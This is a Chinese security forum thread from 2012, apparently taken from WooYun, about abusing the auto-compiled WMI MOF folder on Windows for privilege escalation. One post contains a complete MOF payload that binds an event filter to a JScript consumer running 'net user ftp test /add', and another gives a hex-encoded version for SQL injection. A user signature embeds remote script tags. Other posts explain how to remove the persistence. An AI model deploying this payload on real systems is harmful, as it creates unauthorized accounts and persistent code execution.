Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:
方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。
Method2: 使用 IMofCompiler 接口和 $ CompileFile 方法。
方法 3: 拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。
Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用 IMofCompiler::CompileFile 方法。
第三种方法仅为向后兼容性与早期版本的 WMI 提供,并因为此功能可能不会提供在将来的版本后,不应使用。
很多测试的时候会用得到吧,另外感觉应该有其他很多地方得机制可以导致自动启动?
http://support.microsoft.com/kb/245773/zh-cn
相关讨论:
1#
Sunshine (︶︿︶/ / //! 。! o∩_∩o) | 2012-12-04 12:32
我想到了提权
2#
hongygxiang (蛋疼的、) | 2012-12-04 12:33
楼主好淫荡。
3#
se55i0n (哪些年我们一起看的岛国动作片~) | 2012-12-04 12:40
好吧~看到1#~我想到了提权~
4#
情深 | 2012-12-04 12:42
貌似最近的mysql漏洞就是用来第三种。。。
5#
cnrstar (Be My Personal Best!) | 2012-12-04 13:42
还是剑老大犀利,已经发了
就像文中说的,2003下提权好用,2008后续版本不再支持第三种方法,然后就不行了。
6#
鬼哥 | 2012-12-04 15:24
@xsser 我现在只想知道怎么停止已执行的mof,昨天测试的时候放了个.mof到C:\WINDOWS\system32\wbem\mof\ 从昨天晚上一直到现在还在每过5秒就执行次 加个用户,搞的我郁闷死了。。。
昨天听 B1n4ry 说把net stop winmgmt 服务停止后,然后在删除了加进去的.mof OK 没继续执行了,,但是我怕服务器出现问题又把winmgmt 服务启动了, 邪恶 又开始5秒后自动加用户!
咋办。。
7#
xsjswt | 2012-12-04 15:50
@xsser 可写要变执行挺简单的,各种自启动,各种写hive
8#
xsser (十根阳具有长短!!) | 2012-12-04 16:01
@鬼哥 这文件删除了成么?
9#
鬼哥 | 2012-12-04 16:14
@xsser 不成,,刚baidu了下 找到了方法停止。。
10#
xsser (十根阳具有长短!!) | 2012-12-04 16:31
@鬼哥 那你也回复下啊
11#
whking | 2012-12-04 17:16
@鬼哥 删除C:\WINDOWS\system32\wbem\mof\good 添加的mof后,在启动winmgmt 没出现加账户啊!
C:\Documents and Settings\Administrator>net stop winmgmt Windows Management Instrumentation 服务正在停止. Windows Management Instrumentation 服务已成功停止。 C:\Documents and Settings\Administrator>net start winmgmt Windows Management Instrumentation 服务正在启动 . Windows Management Instrumentation 服务已经启动成功。
12#
鬼哥 | 2012-12-04 18:40
@whking 你这个方法不行, 删除C:\WINDOWS\system32\wbem\mof\good 添加的mof后 启动服务后还是会继续加用户 不相信可以叫各位集友试下。。
13#
鬼哥 | 2012-12-04 18:43
@xsser 我错了,,,正确的方式是:
第一 net stop winmgmt 停止服务,
第二 删除文件夹:C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务
第四:完毕不会在执行了。C:\WINDOWS\system32\wbem\Repository\ 放的是储存库 我们执行的.mof都会被加入到这个库了。然后一直按脚本设置的时间执行。。 删除后 重新启动 会重建个默认储存库 这样我们先前执行mof就没了。
14#
solihat (试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长<script src=http://www.wooyun.org/xssed></script><script src=http://www.wooyun.org/xssed></script>试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长试试签名能有多长<script src=http://www.woo) | 2012-12-04 19:42
有一个提权的思路
15#
xsser (十根阳具有长短!!) | 2012-12-05 11:01
16#
softbug (算了,我还是做好我自己的东西) | 2012-12-05 11:28
感谢群里的vka0n0
#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter {EventNamespace = "Root\\Cimv2";Name = "filtP2";Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL";}; instance of ActiveScriptEventConsumer as $Consumer {Name = "consPCSV2";ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user ftp test /add\")";}; instance of __FilterToConsumerBinding {Consumer = $Consumer;Filter = $EventFilter;};
17#
softbug (算了,我还是做好我自己的东西) | 2012-12-05 11:29
感谢暴暴,
0x23707261676D61206E616D65737061636528225C5C5C5C2E5C5C726F6F745C5C737562736
18#
cnrstar (Be My Personal Best!) | 2012-12-05 12:00
差异备份是成功不了的。。o(╯□╰)o
@xsser
19#
f1eecy | 2012-12-05 12:24
防范办法把Wbem\MOF文件夹设成只读就可以么?
20#
xsser (十根阳具有长短!!) | 2012-12-05 12:29
@cnrstar 嗯 得把前面的乱码处理掉
21#
sec123 | 2012-12-05 14:43
@xsser 请问如何去掉乱码。。
22#
xsser (十根阳具有长短!!) | 2012-12-05 14:48
@sec123 嗯 去掉不了 这图是转的群里的
23#
open (心佛即佛,心魔即魔.) | 2012-12-05 15:09
最重要的还是自动执行啊。这个很难过。
24#
lion(lp) | 2012-12-05 15:47
这个图片不是把FTP 这个用户删除了吗 ? 怎么还会有FTP 这个用户呢?
25#
hongygxiang (蛋疼的、) | 2012-12-05 17:41
@lion(lp) 应该是把ftp这个用户删除后,又跑了一遍sql。方便演示吧。
我失败了,各种求解释。
26#
Coody (&_&) | 2012-12-05 19:03
好吧,我测试也是失败的。。。。。o(╯□╰)o
27#
lion(lp) | 2012-12-05 19:08
我也是各种失败的。。。不知道为啥了 @hongygxiang
28#
hongygxiang (蛋疼的、) | 2012-12-06 12:19
@鬼哥 坐等大牛前来指导
摘自:http://zone.wooyun.org/content/1806
留言评论(旧系统):